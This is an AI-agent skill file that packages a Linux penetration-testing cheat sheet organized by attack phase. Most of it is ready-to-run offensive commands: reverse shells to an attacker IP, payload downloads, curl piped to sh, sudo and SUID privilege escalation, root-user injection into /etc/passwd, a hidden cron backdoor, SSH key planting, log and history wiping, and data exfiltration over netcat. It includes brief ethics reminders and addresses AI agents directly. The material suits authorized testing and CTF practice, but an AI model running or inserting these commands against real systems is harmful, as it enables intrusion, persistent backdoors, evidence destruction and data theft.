Practical Linux command reference for penetration testing including recon, enumeration, exploitation, privilege escalation, and post-exploitation techniques.
---
name: linux-pentester-notes
description: Practical Linux command reference for penetration testing including recon, enumeration, exploitation, privilege escalation, and post-exploitation techniques.
triggers:
- how do I perform Linux reconnaissance for pentesting
- show me privilege escalation commands for Linux
- what are common Linux enumeration techniques
- help me with Linux post-exploitation commands
- I need Linux pentesting command examples
- show me how to exploit Linux systems
- what commands should I use for Linux recon
- help with Linux security testing commands
---
# Linux Pentester Notes Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
**Linux-for-a-Pentester** is a curated collection of practical Linux commands and techniques organized by penetration testing phases. This repository serves as a quick reference guide for security professionals conducting assessments, CTF challenges, or security research on Linux systems.
The repository is structured around the standard penetration testing methodology:
- General Commands (survival essentials)
- Reconnaissance (information gathering)
- Enumeration (deep service analysis)
- Exploitation (gaining initial access)
- Privilege Escalation (elevating permissions)
- Post-Exploitation (persistence and lateral movement)
## Installation
This is a reference repository, not an installable tool. Clone it locally for quick access during engagements:
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
# Optional: Create an alias for quick access
echo "alias pentester='cd ~/Linux-for-a-Pentester && ls -la'" >> ~/.bashrc
source ~/.bashrc
```
## Repository Structure
The repository is organized into directories by testing phase:
```
Linux-for-a-Pentester/
├── 00-General-Commands/ # Basic Linux survival commands
├── 01-Recon/ # Reconnaissance techniques
├── 02-Enumeration/ # Service and user enumeration
├── 03-Exploitation/ # Initial access techniques
├── 04-Privilege-Escalation/ # Privilege escalation methods
├── 05-Post-Exploitation/ # Persistence and cleanup
└── Cheatsheets/ # Quick reference one-liners
```
## Key Command Categories
### General Commands (00-General-Commands/)
Essential Linux commands for navigating and understanding target systems:
```bash
# System information
uname -a # Kernel version and architecture
cat /etc/os-release # Distribution information
hostname # Current hostname
uptime # System uptime and load
# File operations
find / -name "*.conf" 2>/dev/null # Find configuration files
grep -r "password" /home 2>/dev/null # Recursive search
locate suid # Locate files quickly
which python python3 # Find binary locations
# Process management
ps aux # All running processes
ps -ef --forest # Process tree view
top # Real-time process monitor
netstat -tulpn # Listening ports (legacy)
ss -tulpn # Listening ports (modern)
```
### Reconnaissance (01-Recon/)
Local and network reconnaissance commands:
```bash
# Network information
ip a # IP addresses and interfaces
ip route # Routing table
arp -a # ARP cache
cat /etc/resolv.conf # DNS configuration
# User enumeration
whoami # Current user
id # User ID and groups
w # Logged in users
last # Login history
cat /etc/passwd # User accounts
cat /etc/group # Group information
# File system reconnaissance
df -h # Disk usage
mount # Mounted filesystems
cat /etc/fstab # Filesystem table
lsblk # Block devices
# Network scanning (if tools available)
ping -c 3 $TARGET_IP
nmap -sn 192.168.1.0/24 # Host discovery
nmap -p- $TARGET_IP # Full port scan
```
### Enumeration (02-Enumeration/)
Deep service and configuration analysis:
```bash
# Service enumeration
systemctl list-units --type=service # Active services
ps aux | grep root # Root processes
crontab -l # User cron jobs
cat /etc/crontab # System cron jobs
ls -la /etc/cron.* # Cron directories
# SUID/SGID files (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null # SUID files
find / -perm -2000 -type f 2>/dev/null # SGID files
find / -perm -u=s -type f 2>/dev/null # Alternative SUID search
# Writable files and directories
find / -writable -type d 2>/dev/null # Writable directories
find / -writable -type f 2>/dev/null # Writable files
find /etc -writable 2>/dev/null # Writable config files
# Capabilities (often overlooked)
getcap -r / 2>/dev/null # Files with capabilities
# Environment and configuration
env # Environment variables
cat /etc/environment # System-wide environment
history # Command history
cat ~/.bash_history # User command history
```
### Exploitation (03-Exploitation/)
Techniques for gaining initial access:
```bash
# Reverse shells
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
nc -e /bin/bash $ATTACKER_IP 4444
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Shell stabilization
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Then Ctrl+Z, then:
stty raw -echo; fg
# Press Enter twice
# File upload techniques
# Using wget
wget http://$ATTACKER_IP:8000/payload.sh -O /tmp/payload.sh
# Using curl
curl http://$ATTACKER_IP:8000/payload.sh -o /tmp/payload.sh
# Using nc (if available)
nc $ATTACKER_IP 9999 > /tmp/payload.sh
# On attacker: nc -lvnp 9999 < payload.sh
# Using base64 (for text files/scripts)
echo "base64_encoded_payload" | base64 -d > /tmp/payload.sh
```
### Privilege Escalation (04-Privilege-Escalation/)
Methods to elevate privileges to root:
```bash
# Automated enumeration scripts
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Sudo abuse
sudo -l # Check sudo permissions
# If (ALL) NOPASSWD: /usr/bin/find
sudo find /etc -exec /bin/bash \;
# If (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
# Kernel exploits (use with caution)
uname -r # Check kernel version
searchsploit linux kernel 4.15 # Find exploits
# Writable /etc/passwd
# If /etc/passwd is writable
openssl passwd -1 -salt salt password123
echo 'newroot:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot
# Cron job abuse
# If cron job runs as root and editable
echo 'bash -i >& /dev/tcp/$ATTACKER_IP/5555 0>&1' >> /path/to/cronjob.sh
# Path hijacking
# If sudo command has relative path
echo '/bin/bash' > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
sudo vulnerable_command
# Capabilities abuse
# If python has cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
### Post-Exploitation (05-Post-Exploitation/)
Maintaining access and covering tracks:
```bash
# User creation (persistence)
useradd -m -s /bin/bash backdoor
echo 'backdoor:password123' | chpasswd
usermod -aG sudo backdoor # Add to sudo group
# SSH key persistence
mkdir -p /root/.ssh
echo "$ATTACKER_SSH_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Backdoor scripts
cat > /usr/local/bin/.backdoor.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/$ATTACKER_IP/6666 0>&1
EOF
chmod +x /usr/local/bin/.backdoor.sh
# Cron persistence
echo "*/5 * * * * /usr/local/bin/.backdoor.sh" | crontab -
# Log cleanup
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history
history -c
unset HISTFILE
# Data exfiltration
tar czf - /etc /home | nc $ATTACKER_IP 7777
# On attacker: nc -lvnp 7777 > exfil.tar.gz
```
## Common Patterns
### Pattern 1: Initial Shell to Stable TTY
```bash
# 1. Get initial shell (reverse shell)
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
# 2. Upgrade to TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 3. Background with Ctrl+Z, then:
stty raw -echo; fg
# 4. Set terminal type
export TERM=xterm-256color
# 5. Adjust rows/columns (optional)
stty rows 38 columns 116
```
### Pattern 2: Full System Enumeration
```bash
# System info
uname -a
cat /etc/os-release
hostname
# Users and groups
cat /etc/passwd
cat /etc/group
id
sudo -l
# Network
ip a
ip route
ss -tulpn
cat /etc/hosts
# Services and processes
ps aux
systemctl list-units --type=service
cat /etc/crontab
crontab -l
# SUID binaries
find / -perm -4000 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/null | grep -v proc
# Capabilities
getcap -r / 2>/dev/null
```
### Pattern 3: Quick Privesc Check
```bash
# Check sudo rights
sudo -l
# Find SUID binaries (GTFOBins)
find / -perm -4000 -type f 2>/dev/null
# Check writable files in sensitive locations
find /etc /root /home -writable 2>/dev/null
# Check capabilities
getcap -r / 2>/dev/null
# Check kernel version for exploits
uname -r
# Check for passwords in files
grep -r -i "password" /home /var/www /opt 2>/dev/null
```
## Troubleshooting
### Issue: Commands Not Found
Some systems have minimal installations. Check for alternatives:
```bash
# If netstat not available, use ss
ss -tulpn
# If ifconfig not available, use ip
ip a
# If wget not available, use curl
curl -O http://example.com/file
# If python not available, try python3
which python python3 python2
```
### Issue: Permission Denied Errors
Redirect stderr to /dev/null to clean up output:
```bash
find / -name "config" 2>/dev/null
grep -r "password" / 2>/dev/null
```
### Issue: Shell Not Stabilizing
Try alternative methods:
```bash
# Method 1: Python
python -c 'import pty; pty.spawn("/bin/bash")'
# Method 2: Script
script /dev/null -c bash
# Method 3: Expect
expect -c 'spawn /bin/bash; interact'
# Method 4: Perl
perl -e 'exec "/bin/bash";'
```
### Issue: No Internet Access on Target
Transfer files using base64 encoding:
```bash
# On attacker:
base64 -w0 tool.sh > tool.b64
# Copy output, then on target:
echo "BASE64_STRING" | base64 -d > tool.sh
chmod +x tool.sh
```
## Integration with Testing Workflows
### Use During Active Engagement
```bash
# Quick reference during testing
cd ~/Linux-for-a-Pentester
grep -r "SUID" .
cat 04-Privilege-Escalation/suid-exploitation.md
```
### Reference for Report Writing
The repository structure mirrors standard penetration testing phases, making it easy to reference during report writing and ensuring comprehensive coverage of testing activities.
### CTF and Lab Practice
Use these commands as a checklist when practicing in:
- HackTheBox machines
- TryHackMe rooms
- OSCP lab machines
- VulnHub VMs
## Best Practices
1. **Always get permission** before testing on systems you don't own
2. **Document everything** during engagements
3. **Test in isolated environments** first
4. **Use automation wisely** but understand what commands do
5. **Clean up after testing** (remove backdoors, restore configs)
6. **Stay updated** with new techniques and CVEs
## Additional Resources
- **GTFOBins**: https://gtfobins.github.io/ (SUID/Sudo abuse)
- **HackTricks**: https://book.hacktricks.xyz/ (Comprehensive pentesting guide)
- **PayloadsAllTheThings**: https://github.com/swisskyrepo/PayloadsAllTheThings
- **PEASS-ng**: https://github.com/carlospolop/PEASS-ng (LinPEAS enumeration)
## Notes for AI Agents
When helping users with Linux penetration testing:
1. **Always emphasize legal and ethical boundaries**
2. **Recommend testing only on authorized systems**
3. **Explain command flags and options** for learning
4. **Suggest multiple approaches** when one may fail
5. **Remind users to document findings** for reporting
6. **Warn about destructive commands** (rm, dd, etc.)
7. **Encourage understanding over memorization**
This repository is a reference guide, not a step-by-step tutorial. Each engagement is unique and requires critical thinking and adaptation.
Creator's repository · aradotso/security-skills